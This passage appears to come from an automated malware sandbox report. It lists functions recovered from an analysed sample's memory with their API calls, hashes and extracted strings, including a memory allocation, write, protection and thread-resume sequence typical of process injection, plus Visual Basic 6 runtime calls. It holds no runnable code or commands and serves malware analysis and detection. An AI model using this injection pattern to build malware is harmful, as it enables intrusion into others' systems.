Function 020B9AAF, Relevance: 1.6, APIs: 1, Instructions: 120nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 501e2d6b77f3a5861e0caae10a7742fb14fba26eb8f2c49dba0288701bd17333
Instruction ID: 613c9003850e67e17196ac8deb3317df7c5f1f3e626d51cf7c985e3b89f0bc38
Opcode Fuzzy Hash: 501e2d6b77f3a5861e0caae10a7742fb14fba26eb8f2c49dba0288701bd17333
Instruction Fuzzy Hash: 5B410E31601308CFEB778E38CA947EA72A2AF85311F558569DE429B219D338C981AF85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5230, Relevance: 1.6, APIs: 1, Instructions: 111librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 9de9f421b056fed892a1a6414115544300a7a890c46f6bf793ee1a8a629f9296
Instruction ID: c32c6ae70ef0c6d8f0606fa281207bc7d9634600edfc368a120d2599d863a9f7
Opcode Fuzzy Hash: 9de9f421b056fed892a1a6414115544300a7a890c46f6bf793ee1a8a629f9296
Instruction Fuzzy Hash: C34103712043099FDB7A5F24CD80BED7BA3FF86354F544228ED899B2A0D7328981EB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B5D90, Relevance: 1.6, APIs: 1, Instructions: 110memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: b6ee819bda090183f1e566e1fb2e447141c6e39774e91d088a61fb6a1fdbb7c1
Instruction ID: bf1824ba5713aa9b7efb1e91cd56b6b6158d05a172206bf8a7c8d3084142ad0a
Opcode Fuzzy Hash: b6ee819bda090183f1e566e1fb2e447141c6e39774e91d088a61fb6a1fdbb7c1
Instruction Fuzzy Hash: 3641223260834ACFDB356E64DD953EE7BB1EF0A390F85005EDC8A97250D3308A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B9AEC, Relevance: 1.6, APIs: 1, Instructions: 106nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ada3a90e0b47fd3faed54541cfbe595727b07b2485ab40d0767355842e401a8f
Instruction ID: a903d5fa1a8b0c7b1bf3dd4836171f8d3edae698e79dfd98afde09d866592eed
Opcode Fuzzy Hash: ada3a90e0b47fd3faed54541cfbe595727b07b2485ab40d0767355842e401a8f
Instruction Fuzzy Hash: B831013160130CCFEB779E34CA947EA32E2AF85311F56846ACE428B129D338C581EF85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5DAD, Relevance: 1.6, APIs: 1, Instructions: 105memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 0b83144c11134d2d1165ed0bbea3caae7f40906c78563d3a34adea93e1dd2d08
Instruction ID: 5df474b68da095a0787dc94dcfcb2037f3f0b7e20c2518d8b2407fe0d5a16d4d
Opcode Fuzzy Hash: 0b83144c11134d2d1165ed0bbea3caae7f40906c78563d3a34adea93e1dd2d08
Instruction Fuzzy Hash: 1B41CF7260434ACFEB35AE64DD953DEBBB2EF0A394F840459DDCA97260D3309985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B5DE9, Relevance: 1.6, APIs: 1, Instructions: 94memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5f9d29a46fe8173fa8c184623bff7870e42213ac9b615fe919327457200c4a35
Instruction ID: 4871d1c2ffa62b2a418060788c5c9969ae901583c920a0c55ad9649e2c55ffb2
Opcode Fuzzy Hash: 5f9d29a46fe8173fa8c184623bff7870e42213ac9b615fe919327457200c4a35
Instruction Fuzzy Hash: 4231CF7260934ACFDB359E64DD857DE7BB1FF0A354F840459DD8A97260D3309A85CB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B528D, Relevance: 1.6, APIs: 1, Instructions: 90librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 8d7b7193201631df1ec416c11bd0f85429ba9240f76a5d51259a4605bb7aa0ae
Instruction ID: 59f4d38639565067fe10feba4d1d0351c9c7320c19f14b815b5ad0776a488395
Opcode Fuzzy Hash: 8d7b7193201631df1ec416c11bd0f85429ba9240f76a5d51259a4605bb7aa0ae
Instruction Fuzzy Hash: 7431F1B1204309AFDB765F64CD80BE87BB2FF06350F944168ED899B260D7729881EF01

Uniqueness

Uniqueness Score: -1.00%

Function 020B5B95, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1867175d1d7727edabd57595f0db18c6d3b500b6a33251d5fce68a44d8ce0772
Instruction ID: 55c79e20f548d9025372408c11d86c0b14155107a85bd4d833c2707aa796288e
Opcode Fuzzy Hash: 1867175d1d7727edabd57595f0db18c6d3b500b6a33251d5fce68a44d8ce0772
Instruction Fuzzy Hash: 8121F33160274D8FCB639A388881ADD7771FFC6351F7415A1D4408BA27D725899AFBC1

Uniqueness

Uniqueness Score: -1.00%

Function 020B9B4B, Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7b679e2b32dfa8b19d7cbd389721e2ed939de0a19775bba954466b9083b42a7b
Instruction ID: 1010359f3f63bacdca6e85af5a8bb519db0271fcb28407e29ced398d313f2477
Opcode Fuzzy Hash: 7b679e2b32dfa8b19d7cbd389721e2ed939de0a19775bba954466b9083b42a7b
Instruction Fuzzy Hash: D421E03160130CCFEB778E28CA947EA33E2AF84316F55842ADD01D7119D339C486AE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5E47, Relevance: 1.6, APIs: 1, Instructions: 77memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5774e542470823f02c130e8d987989124f16606b83eafd0b9bd1ae0f003cd94f
Instruction ID: 0a65ad8c31365552cdcc69243642795b7a62bae03ec5f27b494132d1d136182f
Opcode Fuzzy Hash: 5774e542470823f02c130e8d987989124f16606b83eafd0b9bd1ae0f003cd94f
Instruction Fuzzy Hash: 6D31CE7160934ACFDB359E65DD857DDBBB1FF0A354F840499DC8AAB260C3709A81CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B9B83, Relevance: 1.6, APIs: 1, Instructions: 72nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b58ef9f6f00d7ad1b7c2dc2d2ed34ef972bcde56577b2650d0746b57b9bd2ee1
Instruction ID: 42a80dcd6c614d61a5690ec6e11a0caf4afe4105af5864887ae4229745b2a156
Opcode Fuzzy Hash: b58ef9f6f00d7ad1b7c2dc2d2ed34ef972bcde56577b2650d0746b57b9bd2ee1
Instruction Fuzzy Hash: C121743160130CCEEB379A28C5957EA73E2AF84322F218869DD41CB159D379D981EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5EA8, Relevance: 1.6, APIs: 1, Instructions: 59memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3fa99e502b8a1811ae742377f6d0ee711614954fd39bfc9216465cb32b0aff8b
Instruction ID: b6dc30a645e35f1a651b159fab0e65ba5631ae4a5bec22588ad5d112e26976b2
Opcode Fuzzy Hash: 3fa99e502b8a1811ae742377f6d0ee711614954fd39bfc9216465cb32b0aff8b
Instruction Fuzzy Hash: 7F11BE7260574A9FDB359E64CD857DDBBB2FF0A314F840559ED89AB220C3308A86DB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B9BCB, Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1a7755eda7c4fa7f157a789347822c8440c57edf07ace859d38d9e089c372308
Instruction ID: 74b70274b9a6372d80c867dc5463614089eeee221323ff0d333a3001d4bfcad8
Opcode Fuzzy Hash: 1a7755eda7c4fa7f157a789347822c8440c57edf07ace859d38d9e089c372308
Instruction Fuzzy Hash: BC117C3160230CCFEB778E24C1997AA73E2AF80316F219468CD01D716AD379D8C5EE88

Uniqueness

Uniqueness Score: -1.00%

Function 020B9C14, Relevance: 1.5, APIs: 1, Instructions: 44nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c6439508188e6e90bbc7ec8ca1152c3c076cc637e8b2f4a98f945d8b6b7a7fde
Instruction ID: 85e7cf97a5da81ade4c4f7684aefd2225997b83079d72b772fb5daf1480a6542
Opcode Fuzzy Hash: c6439508188e6e90bbc7ec8ca1152c3c076cc637e8b2f4a98f945d8b6b7a7fde
Instruction Fuzzy Hash: C001A43160230CCFEF779E24C1947A973E2AF80326F218468CD0197559C379C5C5EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B93CD, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 020B944A

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 33f2c224d83be0e43be1d1abd439589736f49e6b8693a23602193eb115f33542
Instruction ID: 3a60629c6bbd28d96c5e0a2539907590bc887077dcf0a5f2380a8328ccf86ae0
Opcode Fuzzy Hash: 33f2c224d83be0e43be1d1abd439589736f49e6b8693a23602193eb115f33542
Instruction Fuzzy Hash: 1FF06D729582589FDB34CF2CC804AEEB7F9AFD4700F05801AE848A7304C6B0AE01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 020B9417, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 020B944A

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 50299aba797fde45251ba8714cad683b0e0bbecd85ddef2480fb09ba4735348e
Instruction ID: 4e0ef1ad3830b373b01b19041c1e984b82752b2431d31156165abff363167ca5
Opcode Fuzzy Hash: 50299aba797fde45251ba8714cad683b0e0bbecd85ddef2480fb09ba4735348e
Instruction Fuzzy Hash: 00D05EB2559A29DFC7459F6089428AAF3B5BFA1E80F11108D94D152014D7F02BA1CB93

Uniqueness

Uniqueness Score: -1.00%

Function 020B4300, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: LO
API String ID: 0-2847742878
Opcode ID: ba3c1f0fee900909288f578957ad33fda612c0296066b6995d115e46a49fa25c
Instruction ID: eba2769e2f3c4a9a78a3ff7c107043ff1a6b46a56740b27bf61ce9a0780c3c73
Opcode Fuzzy Hash: ba3c1f0fee900909288f578957ad33fda612c0296066b6995d115e46a49fa25c
Instruction Fuzzy Hash: C0918A72908345CFEB769E2889A43EFB7E3AF44354F05422ECC8657691D7349A81DB06

Uniqueness

Uniqueness Score: -1.00%

Function 020B41A7, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: LO
API String ID: 0-2847742878
Opcode ID: 1f687211c580b09b24cc8169638cd09f8dbaf81a93832360d915cd544df2a8ca
Instruction ID: e787787655cc475282f1e46664efa46d905124685f31de515529341463f9c76b
Opcode Fuzzy Hash: 1f687211c580b09b24cc8169638cd09f8dbaf81a93832360d915cd544df2a8ca
Instruction Fuzzy Hash: E0919E32908385CFDF369F38C8947EEB7A2AF41354F45426ECC8697296E3349985D742

Uniqueness

Uniqueness Score: -1.00%

Function 020B247D, Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: LO
API String ID: 2167126740-2847742878
Opcode ID: e946f1f2c76c7a9e4e83fb3f81478e65c768c1ea889079f291c0d35cb487b65b
Instruction ID: 2bd0cb7881008f711c689df70ee4d94c4cbd744321bde5aefe2f7fcd4f3e1266
Opcode Fuzzy Hash: e946f1f2c76c7a9e4e83fb3f81478e65c768c1ea889079f291c0d35cb487b65b
Instruction Fuzzy Hash: 39814572A08385CFDB759F38C9947EEB7A3AF95350F06422EDC8697250E7309981DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B093E, Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: LO
API String ID: 1029625771-2847742878
Opcode ID: ff7eb8d71b9e92bac1867adedb485c69cb1daf73ee083eb003e5edf5eeb3c4e6
Instruction ID: 793b7883c86ca17e8eea63136ab52ab0c156d0096074b67ef2aa8f1fe588725e
Opcode Fuzzy Hash: ff7eb8d71b9e92bac1867adedb485c69cb1daf73ee083eb003e5edf5eeb3c4e6
Instruction Fuzzy Hash: E0517832A18395CFDB369F3889547FEB7A3AF45350F06422EDC82A7250E7309981DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B095B, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: LO
API String ID: 1029625771-2847742878
Opcode ID: e0c7f09ea41b38c620ace740b006f3b9532279ddee89d9f97192b58bdb62bcc1
Instruction ID: 6e6c56114dac457c45b0c76da1b3878a892ca29942082bef37a8227b02c3f586
Opcode Fuzzy Hash: e0c7f09ea41b38c620ace740b006f3b9532279ddee89d9f97192b58bdb62bcc1
Instruction Fuzzy Hash: 6F515536A18395CFEB399E3888557FEB7A2AF45354F05022EDC82A7250E7309985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B09FD, Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: LO
API String ID: 1029625771-2847742878
Opcode ID: 3c1ef0943097191b7f29af0af948282003e86c2a99753059f89ec523a0b391bf
Instruction ID: b4d6ea24c7e405ca263bdf6204c47f88d8e8469ee22cd5b77e8bcffbd3b5b0aa
Opcode Fuzzy Hash: 3c1ef0943097191b7f29af0af948282003e86c2a99753059f89ec523a0b391bf
Instruction Fuzzy Hash: A7518833A18395CFDF369F3888547EEB7A2AF45354F05022ADC86A7250E7309E81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0A37, Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: LO
API String ID: 1029625771-2847742878
Opcode ID: a92dd3e232ecbcbc026093f6e4f76d1bdf6515b77319cfe3acd9d8e74f0baabf
Instruction ID: 13574e5341301464e54e255034ddc9e8e64ae3ff361fdaca812deea6e3977c53
Opcode Fuzzy Hash: a92dd3e232ecbcbc026093f6e4f76d1bdf6515b77319cfe3acd9d8e74f0baabf
Instruction Fuzzy Hash: B3415436A19395CFEB369F38C8957EEB7B2AF05354F05022AEC8297251E320DD45DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0A88, Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: LO
API String ID: 0-2847742878
Opcode ID: 01b7e21a2d8f35cb39dbdcdc36cd3fd360cb7b51b20f771923444124021abae3
Instruction ID: 019e91bb04d6da88e75cd4278998da0dc9c3428fe84a5d22ad7d288a2be1c57d
Opcode Fuzzy Hash: 01b7e21a2d8f35cb39dbdcdc36cd3fd360cb7b51b20f771923444124021abae3
Instruction Fuzzy Hash: 7C416872919385CFEB32DF388C557EEBBB2AF41354F05021EDC81972A1E3209945DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD8B, Relevance: 1.4, APIs: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000F000,00001000,?,00412D48,00000000,?,00401316), ref: 0040DF35

Memory Dump Source

Source File: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 49ca10c0d01cdba04421cfea39d4b3ab834a2a19b380f7ad4c8e1aae48af5fe5
Instruction ID: f5f4e556c567ae7bc501d41eda6f07bbbba872596e64270d221665cc53715f54
Opcode Fuzzy Hash: 49ca10c0d01cdba04421cfea39d4b3ab834a2a19b380f7ad4c8e1aae48af5fe5
Instruction Fuzzy Hash: 3531DC73D597049BC79328B4C881945AB91FF27290731872ADD20BB2B4FB3B4D4E0AC4

Uniqueness

Uniqueness Score: -1.00%

Function 00412330, Relevance: 262.2, APIs: 111, Strings: 38, Instructions: 1488COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00412442
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00412470
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000110), ref: 004124A4
__vbaStrMove.MSVBVM60 ref: 004124BF
__vbaFreeObj.MSVBVM60 ref: 004124C7
__vbaStrCat.MSVBVM60(00402C94,00402C94,00000001), ref: 004124D9
__vbaStrMove.MSVBVM60 ref: 004124E7
#616.MSVBVM60(00000000), ref: 004124EA
__vbaStrMove.MSVBVM60 ref: 004124F8
__vbaStrCmp.MSVBVM60(00402C94,00000000), ref: 00412500
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 00412520
#705.MSVBVM60(00000002,00000000), ref: 0041254B
__vbaStrMove.MSVBVM60 ref: 00412556
__vbaFreeVar.MSVBVM60 ref: 00412568
#648.MSVBVM60(0000000A), ref: 00412585
__vbaFreeVar.MSVBVM60 ref: 00412591
__vbaSetSystemError.MSVBVM60(00000000), ref: 004125A5
#598.MSVBVM60 ref: 004125BB
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004125D4
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004125FC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,000000E0), ref: 00412628
__vbaStrMove.MSVBVM60 ref: 0041263D
__vbaFreeObj.MSVBVM60 ref: 00412649
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00412662
__vbaObjVar.MSVBVM60(?), ref: 00412677
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00412685
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000010), ref: 004126A5
__vbaFreeObj.MSVBVM60 ref: 004126B5
__vbaRecUniToAnsi.MSVBVM60(004026B4,?,?), ref: 004126CE
__vbaSetSystemError.MSVBVM60(00000000), ref: 004126E0
__vbaRecAnsiToUni.MSVBVM60(004026B4,?,?), ref: 004126F9
#594.MSVBVM60(0000000A), ref: 00412726
__vbaFreeVar.MSVBVM60 ref: 00412738
#648.MSVBVM60(0000000A), ref: 00412755
__vbaFreeVar.MSVBVM60 ref: 00412761
__vbaFpI4.MSVBVM60 ref: 0041276B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025E4,00000064), ref: 00412785
__vbaSetSystemError.MSVBVM60 ref: 00412792
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004127BB
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004127E3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,000000C8), ref: 0041280F
__vbaFreeObj.MSVBVM60 ref: 00412817
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00412830
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00412858
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000130), ref: 00412884
__vbaStrMove.MSVBVM60 ref: 0041289C
__vbaFreeObj.MSVBVM60 ref: 004128A8
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004128C1
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,0000004C), ref: 004128E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040334C,0000001C,?,?,?,?), ref: 00412950
__vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 00412967
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00412973
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000700), ref: 00412992
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000700), ref: 004129AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000714), ref: 00412A23
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000708), ref: 00412A3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000704), ref: 00412A84
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000710), ref: 00412ADF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000708), ref: 00412AFA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000708), ref: 00412B39
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,0000070C), ref: 00412B7B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000700), ref: 00412B96
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,0000070C), ref: 00412C2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000704), ref: 00412C4E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000710), ref: 00412CF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402614,00000708), ref: 00412D12
__vbaFreeObj.MSVBVM60(00413A30), ref: 004139D6
__vbaFreeStr.MSVBVM60 ref: 004139E1
__vbaFreeStr.MSVBVM60 ref: 004139E6

Strings

u, xrefs: 00412CC8
$i, xrefs: 00413D82
C5N, xrefs: 00413F7D
~, xrefs: 004147C4
`\, xrefs: 00413E6C
o4 , xrefs: 00413EBA
7/, xrefs: 00413B73
~E, xrefs: 00413C63
^, xrefs: 004142F1
H., xrefs: 004142FE
wej, xrefs: 00413FFF
q2;, xrefs: 0041412A
k_|, xrefs: 00413CE6
LjH, xrefs: 004146C0
V:I, xrefs: 00413DD0
N8, xrefs: 004145F0
n$, xrefs: 004143F5
c52, xrefs: 00414790
SELFLLENE, xrefs: 00412AC3
IHL, xrefs: 004146DA
Q5,, xrefs: 00414769
BECRAWLED, xrefs: 004129D7
Fii, xrefs: 0041463E
WDz, xrefs: 00413C1D
Up, xrefs: 00414520
s'O, xrefs: 004129B1, 004129B7
gF, xrefs: 00413D0D
n!, xrefs: 004144B8
lR, xrefs: 00413D27
78, xrefs: 00414359
QY, xrefs: 00413E86
(T-, xrefs: 00414144
Detenternes5, xrefs: 00412A94
cC, xrefs: 00413EFB
haandslags, xrefs: 00412CDB
COSMOLINE, xrefs: 004129BD
sM, xrefs: 00413D34
Supercapabilities, xrefs: 00412C5C

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$MoveNew2$ErrorSystem$#648Ansi$#594#598#616#705AddrefList
String ID: gF$$i$(T-$BECRAWLED$C5N$COSMOLINE$Detenternes5$Fii$IHL$LjH$Q5,$SELFLLENE$Supercapabilities$Up$V:I$WDz$c52$haandslags$k_|$n$$o4 $q2;$s'O$wej$~E$7/$78$H.$N8$QY$`\$cC$lR$n!$sM$u$^$~
API String ID: 2590503593-1252648874
Opcode ID: 7562b2a4dfda0b13bc30ede8a98589153a74e005ade15bfd087434634f6c07bf
Instruction ID: db6a535a11f63bcd57686298b29fa0ef5c7e97d1317cd341eb83dd4e64aa0c28
Opcode Fuzzy Hash: 7562b2a4dfda0b13bc30ede8a98589153a74e005ade15bfd087434634f6c07bf
Instruction Fuzzy Hash: 32F207B49002099FCB14DFA4C988ADDBBF5FF48308F1481AAE919BB391C7B56985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004182B0, Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,Lwo7), ref: 00418311
__vbaStrToAnsi.MSVBVM60(?,Chittamwood3,00000000), ref: 0041831D
